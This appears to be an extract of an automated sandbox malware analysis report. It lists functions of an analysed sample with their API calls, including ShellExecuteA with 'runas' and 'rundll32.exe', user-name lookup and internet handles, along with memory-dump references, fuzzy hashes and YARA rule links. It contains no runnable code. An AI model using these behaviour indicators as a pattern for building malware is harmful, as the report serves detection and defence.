                            • Associated: 00000003.00000002.944154999.0000000001426000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944165392.0000000001428000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944179801.000000000142A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944197325.000000000142C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944209577.000000000142E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944223198.0000000001430000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944259364.000000000143D000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944275635.0000000001447000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944289674.0000000001449000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944305770.000000000144E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944318489.0000000001450000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944343623.0000000001452000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944355599.0000000001454000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944372185.0000000001458000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944385917.000000000145A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944407165.000000000145C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944424594.000000000146A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944456168.0000000001472000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944470656.0000000001474000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944482979.0000000001476000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944498650.0000000001478000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944511282.000000000147A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944526676.000000000147C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944539968.000000000147E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944580946.00000000014A7000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944600669.00000000014AE000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944873864.0000000001672000.00000020.00020000.sdmp Download File
                            Similarity
                            • API ID: Heap$Process$AllocateFree$NameUser
                            • String ID:
                            • API String ID: 3830529808-0
                            • Opcode ID: e2f0bebf5074a4603776212d92725776d3d6a36c55bb9e8b04d0f2cb4e64d88c
                            • Instruction ID: 08db3c436369eaf7a9cfdccf2f7cd375fd517444325ca4fdc02d011e82a85f34
                            • Opcode Fuzzy Hash: e2f0bebf5074a4603776212d92725776d3d6a36c55bb9e8b04d0f2cb4e64d88c
                            • Instruction Fuzzy Hash: A7518275D0021AABDB119FA4DC88FAFBBBCEF44210F100565ED05A3240DB749A049BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01252A20, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 295COMMON
                            Download Yara Rule
                            APIs
                            • ShellExecuteA.SHELL32(00000000,?,?,?,00000000,00000000,0127CD15,00000005,?,?,012573C2,0127CD4C,00000001,01281160), ref: 01252A8D
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.943799563.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                            • Associated: 00000003.00000002.943789512.0000000001250000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943825611.0000000001277000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943839345.0000000001280000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943854454.0000000001283000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943875599.0000000001285000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943891078.0000000001288000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943904070.0000000001289000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943917656.000000000128A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944130647.0000000001420000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944141105.0000000001422000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944154999.0000000001426000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944165392.0000000001428000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944179801.000000000142A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944197325.000000000142C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944209577.000000000142E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944223198.0000000001430000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944259364.000000000143D000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944275635.0000000001447000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944289674.0000000001449000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944305770.000000000144E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944318489.0000000001450000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944343623.0000000001452000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944355599.0000000001454000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944372185.0000000001458000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944385917.000000000145A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944407165.000000000145C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944424594.000000000146A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944456168.0000000001472000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944470656.0000000001474000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944482979.0000000001476000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944498650.0000000001478000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944511282.000000000147A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944526676.000000000147C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944539968.000000000147E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944580946.00000000014A7000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944600669.00000000014AE000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944873864.0000000001672000.00000020.00020000.sdmp Download File
                            Similarity
                            • API ID: ExecuteShell
                            • String ID: runas$rundll32.exe
                            • API String ID: 587946157-4081450877
                            • Opcode ID: 5fa854bb65030ea10db209d9fe26cab426ca1cf82a35c30b4ec49b10c3e3cd2b
                            • Instruction ID: ea386c406fbd1f577943fb4b4d16cd41a761ede8d3a242259714e45402523e42
                            • Opcode Fuzzy Hash: 5fa854bb65030ea10db209d9fe26cab426ca1cf82a35c30b4ec49b10c3e3cd2b
                            • Instruction Fuzzy Hash: 03A1167162010AEBEB48DF28CDC5BAE7B6AEF95300F548118FC149B2C5E735DA81CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0125FCF9, Relevance: .2, Instructions: 172COMMON
                            Download Yara Rule
                            APIs
                            • ___std_exception_copy.LIBVCRUNTIME ref: 01251CAE
                            Memory Dump Source
                            • Source File: 00000003.00000002.943799563.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                            • Associated: 00000003.00000002.943789512.0000000001250000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943825611.0000000001277000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943839345.0000000001280000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943854454.0000000001283000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943875599.0000000001285000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943891078.0000000001288000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943904070.0000000001289000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943917656.000000000128A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944130647.0000000001420000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944141105.0000000001422000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944154999.0000000001426000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944165392.0000000001428000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944179801.000000000142A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944197325.000000000142C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944209577.000000000142E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944223198.0000000001430000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944259364.000000000143D000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944275635.0000000001447000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944289674.0000000001449000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944305770.000000000144E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944318489.0000000001450000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944343623.0000000001452000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944355599.0000000001454000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944372185.0000000001458000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944385917.000000000145A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944407165.000000000145C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944424594.000000000146A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944456168.0000000001472000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944470656.0000000001474000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944482979.0000000001476000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944498650.0000000001478000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944511282.000000000147A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944526676.000000000147C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944539968.000000000147E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944580946.00000000014A7000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944600669.00000000014AE000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944873864.0000000001672000.00000020.00020000.sdmp Download File
                            Similarity
                            • API ID: ___std_exception_copy
                            • String ID:
                            • API String ID: 2659868963-0
                            • Opcode ID: f0ede686d81234fa19852909d9e7ff0aed42f9905bc885b2fcca59f4c5270a59
                            • Instruction ID: 9f82349c45e970c89b18983ef45fe112393d7e24f7e1773e3236d2e278e05aa2
                            • Opcode Fuzzy Hash: f0ede686d81234fa19852909d9e7ff0aed42f9905bc885b2fcca59f4c5270a59
                            • Instruction Fuzzy Hash: B651D8B19213068FEB25CF58E5C57AEBBF4FB44311F14846AEA05EB2C4E3709991CB54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01255F80, Relevance: 20.0, APIs: 9, Strings: 2, Instructions: 789COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.943799563.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                            • Associated: 00000003.00000002.943789512.0000000001250000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943825611.0000000001277000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943839345.0000000001280000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943854454.0000000001283000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943875599.0000000001285000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943891078.0000000001288000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943904070.0000000001289000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943917656.000000000128A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944130647.0000000001420000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944141105.0000000001422000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944154999.0000000001426000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944165392.0000000001428000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944179801.000000000142A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944197325.000000000142C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944209577.000000000142E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944223198.0000000001430000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944259364.000000000143D000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944275635.0000000001447000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944289674.0000000001449000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944305770.000000000144E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944318489.0000000001450000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944343623.0000000001452000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944355599.0000000001454000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944372185.0000000001458000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944385917.000000000145A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944407165.000000000145C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944424594.000000000146A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944456168.0000000001472000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944470656.0000000001474000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944482979.0000000001476000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944498650.0000000001478000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944511282.000000000147A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944526676.000000000147C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944539968.000000000147E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944580946.00000000014A7000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944600669.00000000014AE000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944873864.0000000001672000.00000020.00020000.sdmp Download File
                            Similarity
                            • API ID:
                            • String ID: ($]c@m
                            • API String ID: 0-3740295130
                            • Opcode ID: ce24818adfc2941134f5b9e7a722a939392a2783e06ff48576cbbb394ed4bc3d
                            • Instruction ID: def71fcba30759d6ad8234e7461e5160d91e5cca48772aa4ca328bcb734ccbd3
                            • Opcode Fuzzy Hash: ce24818adfc2941134f5b9e7a722a939392a2783e06ff48576cbbb394ed4bc3d
                            • Instruction Fuzzy Hash: 25525971A201059BEB28DF68CDC8BEEBB76EF55300F548298E905A73D5D7349A84CF60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0125AE40, Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 149sleepCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 01252430: InternetCloseHandle.WININET(00000000), ref: 0125250B
                              • Part of subcall function 01252430: InternetCloseHandle.WININET(00000000), ref: 0125250E
                            • Sleep.KERNEL32(00001388), ref: 0125AE6F
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.943799563.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                            • Associated: 00000003.00000002.943789512.0000000001250000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943825611.0000000001277000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943839345.0000000001280000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943854454.0000000001283000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943875599.0000000001285000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943891078.0000000001288000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943904070.0000000001289000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943917656.000000000128A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944130647.0000000001420000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944141105.0000000001422000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944154999.0000000001426000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944165392.0000000001428000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944179801.000000000142A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944197325.000000000142C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944209577.000000000142E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944223198.0000000001430000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944259364.000000000143D000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944275635.0000000001447000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944289674.0000000001449000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944305770.000000000144E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944318489.0000000001450000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944343623.0000000001452000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944355599.0000000001454000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944372185.0000000001458000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944385917.000000000145A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944407165.000000000145C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944424594.000000000146A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944456168.0000000001472000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944470656.0000000001474000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944482979.0000000001476000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944498650.0000000001478000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944511282.000000000147A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944526676.000000000147C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944539968.000000000147E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944580946.00000000014A7000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944600669.00000000014AE000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944873864.0000000001672000.00000020.00020000.sdmp Download File
                            Similarity
                            • API ID: CloseHandleInternet$Sleep
                            • String ID: 152138533219$:::$invalid stoi argument$stoi argument out of range
                            • API String ID: 587253650-2973408965
                            • Opcode ID: 3ffdeecb0285672d357d4a0a93709295a766647ccd37cd5def9d4cb5b5eb208b
                            • Instruction ID: fb39d1dad6e886cedd7781e52cbcdf89449c4d084c690dd0864ddb026c505816
                            • Opcode Fuzzy Hash: 3ffdeecb0285672d357d4a0a93709295a766647ccd37cd5def9d4cb5b5eb208b
                            • Instruction Fuzzy Hash: 6E4114726201056BDB48BE3CCDCA76D7E1AAB92364F504758FC05873C5EA36CA9447D2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0125C0A0, Relevance: 7.4, APIs: 1, Strings: 2, Instructions: 2128COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 01251DA0: GetUserNameW.ADVAPI32(00000000,?), ref: 01251DCA
                              • Part of subcall function 01251DA0: GetProcessHeap.KERNEL32(00000008,?), ref: 01251DDF
                              • Part of subcall function 01251DA0: RtlAllocateHeap.NTDLL(00000000), ref: 01251DE2
                              • Part of subcall function 01251DA0: GetUserNameW.ADVAPI32(00000000,?), ref: 01251DF0
                              • Part of subcall function 01251DA0: GetProcessHeap.KERNEL32(00000008,?), ref: 01251E1E
                              • Part of subcall function 01251DA0: RtlAllocateHeap.NTDLL(00000000), ref: 01251E21
                              • Part of subcall function 01251DA0: GetProcessHeap.KERNEL32(00000008,?), ref: 01251E31
                              • Part of subcall function 01251DA0: RtlAllocateHeap.NTDLL(00000000), ref: 01251E34
                            • GetUserNameW.ADVAPI32(?,00000100), ref: 0125CB92
                              • Part of subcall function 0125EBB0: Concurrency::cancel_current_task.LIBCPMT ref: 0125EC64
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.943799563.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                            • Associated: 00000003.00000002.943789512.0000000001250000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943825611.0000000001277000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943839345.0000000001280000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943854454.0000000001283000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943875599.0000000001285000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943891078.0000000001288000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943904070.0000000001289000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943917656.000000000128A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944130647.0000000001420000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944141105.0000000001422000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944154999.0000000001426000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944165392.0000000001428000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944179801.000000000142A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944197325.000000000142C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944209577.000000000142E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944223198.0000000001430000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944259364.000000000143D000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944275635.0000000001447000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944289674.0000000001449000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944305770.000000000144E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944318489.0000000001450000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944343623.0000000001452000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944355599.0000000001454000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944372185.0000000001458000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944385917.000000000145A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944407165.000000000145C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944424594.000000000146A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944456168.0000000001472000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944470656.0000000001474000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944482979.0000000001476000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944498650.0000000001478000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944511282.000000000147A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944526676.000000000147C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944539968.000000000147E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944580946.00000000014A7000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944600669.00000000014AE000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944873864.0000000001672000.00000020.00020000.sdmp Download File
                            Similarity
                            • API ID: Heap$AllocateNameProcessUser$Concurrency::cancel_current_task
                            • String ID: 152138533219$7b6145
                            • API String ID: 1471344708-2205202256
                            • Opcode ID: 1e88e2cb67c3d786fd71f6ab89a8513f380c83e8d9f795d4ed180b3e66f33ac4
                            • Instruction ID: 6c4e57731efaec661ceb6e798a15178403b3d95f6ee84deb151dae1d6c92a77b
                            • Opcode Fuzzy Hash: 1e88e2cb67c3d786fd71f6ab89a8513f380c83e8d9f795d4ed180b3e66f33ac4
                            • Instruction Fuzzy Hash: 8CF27C71A202054BDB5CDB28CCC47AEBB7AAF91314F14869CE809973D5EB359AC4CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01255D50, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 188COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.943799563.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                            • Associated: 00000003.00000002.943789512.0000000001250000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943825611.0000000001277000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943839345.0000000001280000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943854454.0000000001283000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943875599.0000000001285000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943891078.0000000001288000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943904070.0000000001289000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.943917656.000000000128A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944130647.0000000001420000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944141105.0000000001422000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944154999.0000000001426000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944165392.0000000001428000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944179801.000000000142A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944197325.000000000142C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944209577.000000000142E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944223198.0000000001430000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944259364.000000000143D000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944275635.0000000001447000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944289674.0000000001449000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944305770.000000000144E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944318489.0000000001450000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944343623.0000000001452000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944355599.0000000001454000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944372185.0000000001458000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944385917.000000000145A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944407165.000000000145C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944424594.000000000146A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944456168.0000000001472000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944470656.0000000001474000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944482979.0000000001476000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944498650.0000000001478000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944511282.000000000147A000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944526676.000000000147C000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944539968.000000000147E000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944580946.00000000014A7000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944600669.00000000014AE000.00000040.00020000.sdmp Download File
                            • Associated: 00000003.00000002.944873864.0000000001672000.00000020.00020000.sdmp Download File
                            Similarity
                            • API ID: __fread_nolock
                            • String ID: jjh$jjj$jjjj
                            • API String ID: 2638373210-3331015499
                            • Opcode ID: fbc125da4f20a6c31e0d7a5987f30e2e59b10c1e6fa773bee0f655bf3c205e00
                            • Instruction ID: d9af9435ade5912c48a31975b6b94c155b08a503ec8939b19a33674696423fc4
                            • Opcode Fuzzy Hash: fbc125da4f20a6c31e0d7a5987f30e2e59b10c1e6fa773bee0f655bf3c205e00
                            • Instruction Fuzzy Hash: 3C512771A30106ABEB08EB78CCC5BAE7A69EF66310F448558FD04972D1E735D6D0C7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0125CA50, Relevance: 6.6, APIs: 1, Strings: 2, Instructions: 1365COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 01251DA0: GetUserNameW.ADVAPI32(00000000,?), ref: 01251DCA
                              • Part of subcall function 01251DA0: GetProcessHeap.KERNEL32(00000008,?), ref: 01251DDF
                              • Part of subcall function 01251DA0: RtlAllocateHeap.NTDLL(00000000), ref: 01251DE2
                              • Part of subcall function 01251DA0: GetUserNameW.ADVAPI32(00000000,?), ref: 01251DF0
                              • Part of subcall function 01251DA0: GetProcessHeap.KERNEL32(00000008,?), ref: 01251E1E
                              • Part of subcall function 01251DA0: RtlAllocateHeap.NTDLL(00000000), ref: 01251E21
                              • Part of subcall function 01251DA0: GetProcessHeap.KERNEL32(00000008,?), ref: 01251E31
                              • Part of subcall function 01251DA0: RtlAllocateHeap.NTDLL(00000000), ref: 01251E34
                            • GetUserNameW.ADVAPI32(?,00000100), ref: 0125CB92
